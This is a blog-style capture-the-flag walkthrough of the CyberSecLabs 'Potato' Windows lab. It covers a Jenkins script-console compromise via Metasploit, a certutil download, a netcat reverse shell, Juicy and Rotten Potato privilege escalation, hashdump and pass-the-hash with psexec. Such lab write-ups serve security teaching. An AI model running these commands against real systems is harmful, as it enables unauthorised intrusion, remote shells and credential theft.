csl-potato-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  Potato at  https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

NMAP ENUM

sudo nmap -O -A -p- 172.31.1.19
kali@kali:~/cyberseclabs$ nmap 172.31.1.19
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for 172.31.1.19
Host is up (0.10s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

curl http://172.31.1.19:8080

We get a Jenkins login page  lets try some default credentials the good old admin:admin… 

 

Step 2: Exploitation

Browsing around the console and doing some clicking around, I have no idea what the hell I am looking for. I see a script console and this starts to stir up some evil thoughts on how I can exploit this thing. Did some googling and sure enough I found a Metasploit module that allows us to exploit this bad boy using Java code execution. This exploit can also be done manually without using Metasploit’s spoon feeding by throwing in commands to execute in the console.

Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:

msfconsole
use exploit/multi/http/jenkins_script_console
set RHOSTS 172.31.1.19
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin

by default this module  likes to use reverse_https payload for our reverse connection back. I switched to reverse_tcp for consistency.

set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777
run

Now it starts to exploit giving us back a meterpreter session. I typed the command shell for a detailed shell.

C:\Users\ben\Desktop>type access.txt
type access.txt
11d92ba4a09c10adf0eb3636ad4c57e5
C:\Users\ben\Desktop>

Step 3: Post Exploitation

I ran to see if this thing was vulnerable to the Juicy Potato exploit

C:\Users\ben\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Users\ben\Desktop>

We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.

I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.

We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:

We can now then load the Juicy Potato exploit module using the following commands:

use exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
set LHOST <your ip>
run

Sadly not working for me..

So We first transfer the juicy potato binary on our victim machine. You can get it from here. We also transfer nc.exe(Netcat for windows) to the victim machine.

c:\users\ben>certutil -urlcache -split -f http://10.10.1.1/nc.exe nc.exe

Juicy Potato also requires CLSID as an argument. You can find the list of CLSID for your OS version on the github repo of Juicy Potato. Using the ‘systeminfo’ command we can see that the machine is running Windows server 2012.

Next, we create a batch file, having the following contents.

echo nc.exe -e cmd.exe 10.10.0.38 1337 > rev.bat

This simply means that when rev.bat is run, it will connect to our local machine using nc.exe .

Now, we use juicy potato. But before that let’s set up a netcat listener on our local machine.

Running Juicy potato now,


c:\puck\juicy.exe -p c:\Users\ben\rev.bat -t * -l 6666 -c {e60687f7–01a1–40aa-86ac-db1cbf673334}

Here,

  • -p : Program to launch

Once this is completed, we get a shell back on our machine as NT Authority\system.

again not for me

c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038

let’s go rotten

meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading : /tmp/rottenpotato.exe -> .
[*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop


05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

c:\Users\Administrator\Desktop>
type system.txt
7b57e970b90d4244c5efa500b9dfe457
c:\Users\Administrator\Desktop>
c:\Users\Administrator\Desktop>^Z Background channel 5? [y/N] y meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223::: ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 ad
ministrator@172.31.1.19
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 172.31.1.19.....
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on 172.31.1.19.....
[*] Creating service srVS on 172.31.1.19.....
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
Potato
nt authority\system

C:\Windows\system32>

Author – Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *